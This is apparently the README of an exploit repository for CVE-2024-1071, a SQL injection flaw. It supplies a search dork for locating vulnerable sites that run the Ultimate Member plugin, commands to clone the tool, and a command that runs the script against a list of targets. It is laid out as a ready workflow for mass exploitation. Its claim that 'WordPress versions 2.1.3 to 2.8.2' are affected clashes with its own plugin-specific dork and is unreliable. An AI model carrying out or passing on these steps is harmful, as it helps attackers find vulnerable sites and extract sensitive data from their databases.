WordPress CVE 2024-1071 SQL Exploit

This exploit, which runs on WordPress versions 2.1.3 to 2.8.2, allows unauthenticated attackers to add additional SQL queries to existing queries that can be used to pull sensitive information from the database.

Dork: body="/wp-content/plugins/ultimate-member"

1)

• git clone https://github.com/Dogu589/WordPress-Exploit-CVE-2024-1071.git
• cd WordPress-Exploit-CVE-2024-1071

2)

python3 WordPressExploit.py -f target.txt

CVE

https://nvd.nist.gov/vuln/detail/CVE-2024-1071